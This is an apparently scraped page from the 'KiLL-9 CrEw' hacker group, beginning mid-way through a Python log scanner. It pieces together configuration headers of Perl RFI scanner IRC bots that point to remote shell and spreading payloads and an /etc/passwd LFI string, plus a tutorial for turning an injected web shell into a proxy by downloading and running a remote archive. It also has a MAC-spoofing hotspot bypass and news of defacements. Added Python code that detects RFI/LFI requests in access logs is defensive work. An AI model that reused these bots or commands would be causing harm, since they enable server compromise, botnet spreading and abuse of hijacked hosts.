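            findings.append(Finding(ip, int(status), param, kind))
    return findings


def by_source(findings):
    """Summarise findings as {ip: {kind: count}} for triage."""
    summary = {}
    for f in findings:
        summary.setdefault(f.ip, Counter())[f.kind] += 1
    return {ip: dict(counts) for ip, counts in summary.items()}


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print(by_source(scan(SAMPLE_LOG)))
```

A 200 status on a flagged request does not prove the include succeeded, but those lines are the ones to check first against the application's response size and any outbound connection logs.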

Meffy Scanner

***************************
AUTHOR: Contrex
DATE: December 2009
LANGUAGE: perl (.pl)
**************************

#################################
#!/usr/bin/perl ##
# Meffy ~ RoScan.Net ##
# Author: PRIV8 ##
# RoScan-Team production ##
# We Are R0X ##
#################################
use MIME::Base64;



$process = "/sbin/mingetty"; ## process
my $printcmd = "http://www.vagina.com/sh.txt"; ## r57;c99 shell
my $id = "http://www.vagina.com/id.txt"; ## ID is private
my $spread = "http://www.vagina.com/pbotz.txt"; ## spread
my $ircserver = "irc.indonesiancoder.us" ; ## ur irc server
my $start = "!scan"; ## command to start scan
my $port = "6667"; ## irc server port
my $nickname = "[Scan][" . int( rand(99) ) . "]"; ## nickname
my $admin = "arianom"; ## msg prv
my $channel = "#kill-9"; ## chan
my $chanres = "#kill-9"; ## channel print result
my $verz = "uname -a\n";

print "\n";
print "RFI Start !!\n";
print "--PRIV8--\n";
print "Release $verz\n";
print "Now join $ircserver:$port\n";
print "$channel and $chanres\n";
print "GO GO ;)\n\n";


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;



Albania Scanner

***************************
AUTHOR: Abah_benu
DATE: July 2008
LANGUAGE: perl (.pl)
**************************

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


my $linas_max='10';
my $sleep='1';
my $processo = "httpd -SasSL45";
my $cmd="http://henry14.isfreeweb.com/sh???";
my $id="http://henry14.isfreeweb.com/id.txt???";
my $spread="http://henry14.isfreeweb.com/spread.txt???";
my $server="irc.kamtiez.punked.us";
my $porta="7000";
my $numero=int(rand(100));
my $nick="NabiLa[".$numero."]";
my $canale="#kill-9";
my $verbot = "1.01";
my $stringa = "!scan".$numero;
my $adm = "arianom";
my $out = "".$numero;
my $c0der= "arianom"; # please leave it as it is



Defacing malaysuck site

JAKARTA - A hacker calling himself Arianom has succeeded in breaking into a forum for supporters of Malaysia's incumbent party, UMNO.

"Site Down. Stop the torture of Indonesian citizens," reads the message the hacker left on the site, complete with an image of a pirate skull biting a machete.

As traced by okezone on Saturday (8/8/2009), 'arianom' had in fact carried out this action since Friday (7/8/2009) afternoon. Unfortunately, the site, titled 'Kelab Maya UMNO', still cannot be accessed at all.

Kelab Maya United Malaysian National Organizations (UMNO) is really intended as a discussion venue for UMNO fans. The news and discussions posted mostly revolve around the moves of UMNO's enemies, especially Anwar Ibrahim, to bring down the party of Mahathir Muhammad and Najib Tun Razak.

In addition, news of party cadres and members successfully entering the government cabinet also features on the site.

Unfortunately, that news of success has had to disappear, replaced by the strange image belonging to the hacker, Arianom, who claims to be from the hacker group 'all kill-9 crew'. (srn)

Defacing malaysian site

VIVAnews - Although the controversy over the airing of the Pendet dance in the 'Enigmatic Malaysia' advertisement on Discovery Channel and the dispute over Jemur Island have subsided, that does not mean sentiment against the neighbouring country, Malaysia, has disappeared.

A group of crackers calling themselves 'Arianom' took over a Malaysian site, http://pkgparitraja.com, on Friday 25 September 2009 at 21.13 WIB.

According to VIVAnews's investigation, the site belongs to Pusat Kegiatan Guru Parit Raja, Batu Pahat, located at SK Pintas Puding, Km 21 Jalan Pintas Puding, 86400 Parit Raja, Batu Pahat Johor, Malaysia.

Since Friday night, the site has been inaccessible and its appearance changed, in other words defaced.

The page now carries the sentence "Hacked by Arianom. This site is claimed by the people of Indonesia as a form of retaliation for the Malaysian government's claiming of several Indonesian cultures."

Across the middle of the Malaysian flag, the 'Jalur Gemilang', is also written "This site is Claimed by the People of Indonesia. Hacked by Arianom, Kill-9 Crew."

Lines of text resembling a protest are written on the page. They read:

"You may call us indon. We call you malingsia, thieves of Indonesia's wealth and culture.

We urge the Malaysian government to stop, and to return the several cultures that Malaysia has claimed,

Go ahead and just claim Noordin M Top; we think he is a very valuable Malaysian asset."

Before this action, right on the 52nd anniversary of Malaysian independence on 31 August 2009, a number of crackers changed the appearance of a number of Malaysian sites.
• VIVAnews

Rose Scanner

***************************
AUTHOR: Tukulesto
DATE: December 2008
LANGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

########################################
## Multi RFI - SCAN Commands ##
## By TuX_Sh4D0W ##
## Released : 11 December 2008 ##
## ---------------------------------- ##
##.---..-..-..-.,-..-..-..-. .---.. ##
##`| |'| || || . < | || || |__ | |- \##
## `-' `----'`-'`-'`----'`----'`---'`-##
##------------------------------------##
########################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


###################
## CONFIGURATION ##
###################

my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
my $shell = "http://styrovit.ru/includes/sh.txt??";
my $pbot = "http://styrovit.ru/includes/pbotz.txt??";
my $spread = "http://www.bwdi.or.kr/bbs/spread-rose.txt??";
#my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
#my $shell = "http://styrovit.ru/includes/sh.txt??";

@ircservers = (

"209.41.180.98",

#"localhost",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98"

);



About | MIRC

IRC stands for Internet Relay Chat. Roughly speaking, IRC is a medium for talking in real time with other people on the Internet. IRC works like CB radio, except that you type everything you want to say on the keyboard and you can talk with everyone. You can also see what other people type on your monitor.

Internet Relay Chat was created in the ‘80s as a refinement of communication between UNIX systems, for communicating among two or more people almost simultaneously. IRC is a network of servers that relay conversations from the users connected to those servers. IRC networks are spread across the world. Anyone, anywhere, with an internet connection can take part.

There are a great many discussion channels on IRC. You can join a discussion after choosing a nick name and joining a channel. If you want to try IRC, you can download MIRC from its official site.
To get started, the standard steps are as follows:

All commands begin with a slash ('/')
First join a server (there are many servers in the world), for example /server irc-2.texas.net
Choose a nick name, e.g.: /nick anakblue
To see the list of available channels, type /list
Join a channel, for example /join #kill-9
Then talk....


The easy way... you can download ready-made scripts with shortcuts/short commands in all sorts of variations:

* Mirc601.exe (1.2 MB) > This is the really standard one !!
* Mr^P^.zip (1.9 MB) > (Thanks to Projo...)
* Boss2002.zip (3.2 MB)
* GeniusIRC2.exe (4.7 MB)

Make Proxy From Shell

We are probably no strangers to the thing called a proxy…. As I define it, a proxy is a mirror whose use is intended for private purposes and which serves to disguise our IP address. This time I will briefly explain how to make a proxy through a shell on a web site obtained by injection.

I assume you can already inject a shell, so let’s begin..

* go into the shell we injected
* look for a directory with permission 777 using the command “find / -perm 777 -type d”; if there is none, go straight to the /tmp directory
* wget the proxy file. The command is “wget url/file”, for example: “wget http://3xploit.110mb.com/proxy.tgz”; if that fails, try the lwp-download or fetch command, but with the full URL, for example “lwp-download http://3xploit.110mb.com/proxy.tgz”
* if that does not work either, use an r57 or c99 inject script, which has an upload feature, and upload the proxy.tgz file with that feature. If you do not have the file yet, download it manually from http://3xploit.110mb.com/proxy.tgz and then upload it.
* extract the file with the command “tar -zxvf proxy.tgz”
* after extracting, go into the pro directory with the command “cd pro”
* execute the xh file; the command is “ ./xh -s ./httpd ./prox -a -d -p5050”
* check whether your proxy is alive in an IRC channel that has a bot for checking IPs, for example #kill-9 @irc.indonesiancoder.us
* the check command usually varies, but it is roughly “.port ip 5050”, for example “.port 122.168.9.70 5050”

Notes:

* The default port above is 5050 and can be edited as we wish in “menu.conf”
* This is a tutorial for creating a proxy on a web site obtained by injection
* This tutorial only works on Linux or UNIX-family machines
* All commands above are typed without the double quotes (”)

Rafly Scanner

#!/usr/bin/perl

#################################
## CERME RFI Scanner Bot v2.4 ##
## By Rafly ##
## Copyleft July 2008 ##
## Usage: perl ussil.pl ##
#################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###################
## CONFIGURATION ##
###################

my $id = "http://www.urisan.tche.br/usill-id.txt?";
my $shell = "[kill-9]";
my $spread = "http://www.urisan.tche.br/bajo-spread.txt?";
my $spreads = "http://www.urisan.tche.br/usil-spreads.txt?";
#my $id = "http://www.urisan.tche.br/usill-id.txt?";
#my $shell = "http://www.urisan.tche.br/sh.txt";
@ircservers = (
"irc.indonesiancoder.us",
#"localhost",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us"
);

my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $chan3 = "#kill-9";
my $c1k = "cerme";
my $c2k = "cerme";
my $ircd = $ircservers[rand(scalar(@ircservers))];
my $port = "6667";
my $nick = "ScanNeR[".int(rand(1000))."]";
my $ident = "Priv[".int(rand(1000))."]";
my $admin = "arianom";



Pittbull Scanner

***************************
AUTHOR: Arianom
DATE: April 2008
LANGUAGE: perl (.pl)
***************************

#!/usr/bin/perl
#
# Release Name : aria[kill-pitbull]
#
# RFi Scanner Christmas Release ! :D
#
# ------------- [% Notes %] -------------
# This rfi scanner contains pieces of code from: PitBull CreW, Mic22, Inphex.
# And also let's just say more versions will come :P
#
# With this release you must be happy since its the best RFi Scanner around.

# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.


use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

#################
#[Configuration]#
#################

my $response = "http://www.emabe.com/administrator/templates/response.txt??"; # included in zip as response.txt
my $test = "http://www.emabe.com/administrator/templates/test.txt??"; # included in zip as test.txt
my $printcmd = "http://www.yourhost.com/sh.txt??";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://yourhost.com/pbotz.txt??";
my $nickname = "ngising|".(int(rand(999)));
my $ident = "RFiBeast";
my $channel = "#kill-9";
my $server = "irc.pengangguran.us.to";
my $port = 6667;

#################
#[Configuration]#
#################
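
Seen from the defender's side, requests produced by a scanner configured like this stand out in web access logs: a query parameter carrying an absolute URL (here ending in `??`) or a chain of `../` leading to `/etc/passwd`. The detector below is an added example, not code from the original page; the log lines, hosts, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format). Hosts and IPs are
# documentation values; "libwww-perl" is LWP::UserAgent's default agent string.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2009:10:01:02 +0000] "GET /index.php?page=http://files.example/response.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [12/Dec/2009:10:01:03 +0000] "GET /index.php?page=/../../../../../../../../etc/passwd HTTP/1.1" 200 734 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [12/Dec/2009:10:01:04 +0000] "GET /view.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Dec/2009:10:01:05 +0000] "GET /index.php?page=contact&lang=en HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# client address, request target and status code of one log entry
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3}) ')
# parameter value that is itself a remote URL (remote file inclusion attempt)
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
# two or more parent-directory steps in a row (local file inclusion attempt)
TRAVERSAL_RE = re.compile(r'(?:\.\.[/\\]){2,}')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are inspected in clear."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return (kind, parameter, decoded value) for each suspicious query parameter."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl already decoded one layer
        if REMOTE_URL_RE.match(value):
            findings.append(("rfi", name, value))
        elif TRAVERSAL_RE.search(value) or value.startswith("/etc/"):
            findings.append(("lfi", name, value))
    return findings


def scan_log(lines):
    """Scan access-log lines and return one alert per suspicious parameter."""
    alerts = []
    for line in lines:
        match = LINE_RE.match(line)
        if not match:
            continue  # not a request line this parser understands
        client, target, status = match.groups()
        for kind, name, value in classify_request(target):
            alerts.append({"client": client, "kind": kind, "param": name,
                           "value": value, "status": int(status)})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Parameters that legitimately carry URLs (redirect or callback targets) also match the RFI rule, so a production rule needs an allowlist by parameter name.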



SQL Injection Attacks by Example

A customer asked that we check out his intranet site, which was used by the company's employees and customers. This was part of a larger security review, and though we'd not actually used SQL injection to penetrate a network before, we were pretty familiar with the general concepts. We were completely successful in this engagement, and wanted to recount the steps taken as an illustration.

"SQL Injection" is a subset of the unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises.

We'll note that this was a somewhat winding road with more than one wrong turn, and others with more experience will certainly have different -- and better -- approaches. But the fact that we were successful does suggest that we were not entirely misguided.

There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of discovery as much as the process of exploitation.

Bug Dork PHPBB


Bug Dork WordPress


Bajo Scanner

***************************
AUTHOR: arianom
DATE: December 2009
LANGUAGE: perl (.pl)
**************************

#!/usr/bin/perl
$process = "/usr/sbin/arianom";
my $printcmd = "http://kill-nine.co.nr??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $spreads = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $ircserver = "irc.indonesiancoder.us";
my $start = "!scan";
my $port = "6667";
my $nickname = "sedih" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Pbot RFI Scanner v1.0 beta";


print "\n";
print " Priv 8 Scanner\n";
print " Author: Arianom\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;



HACK WIFI

Sometimes you are happily browsing at a hotspot and the connection suddenly drops... supposedly there is a time limit so that the user can no longer access the internet... Wow... what a hassle... we only want to get information on the internet... and everything we do is restricted... crazy... ahhh... restrictions... so when will the people of Indonesia be able to get free information on the internet... when will the whole internet sector stop being treated as a business arena... this is what makes Indonesians distrust the internet... and get fooled by other nations... in developed countries internet access is unrestricted and FREE... yes, once again, FREE... only here is it treated as a source of inspiration for businesspeople to rake in as much profit as possible... even though we Indonesians are very thirsty for knowledge, especially about computers, so when else... Hehehe... okay, to get around this there are tips and tricks for changing the MAC so that we can roam freely in the cyber world hehehe...

Okay... Straight to the point: first find a hotspot... preferably one that offers free access... but limited only by time..., then just keep using it until the time runs out...

After that there will be an access restriction like the one shown in the picture above... or a message saying “SORRY, YOUR INTERNET TIME HAS RUN OUT, PLEASE COME BACK TOMORROW”, damn!!!!! when will Indonesia advance if the internet keeps being restricted... so like it or not, we work around it.

HOW THE TIME LIMIT WORKS

The time limit can be enforced from the access point in the café, and usually the restriction uses the MAC address. Why the MAC address??? Why not the IP address?? Hmm... the IP address can be changed by yourself from the computer, whereas the MAC can perhaps be changed on Linux, but on Windows??? Well, download a program for changing the MAC at:

click here to download the TMAC software
then install and run it, and it will appear as in the following picture:

then click the CHANGE MAC button to change the MAC address, then click RANDOM MAC ADDRESS,
the MAC address will then be randomized according to the program's proper method, then click CHANGE NOW! and your IP address changes right away.

Wait a few moments for the computer to refresh this change, then reopen the site you want to visit, BANG BANG BANG!!!... you get another 2 hours of free access...

You can see that if the CLICK HERE button is pressed we get free access. Okay... maybe that is all for now from me...

Joomla Bugs

 
KiLL-9 CrEW Copyright © 2009 KiLL-9 CrEw Template Designed by Arianom Founder KilLL-9 CrEw Best Indonesian White Hacker. Allright Reserved.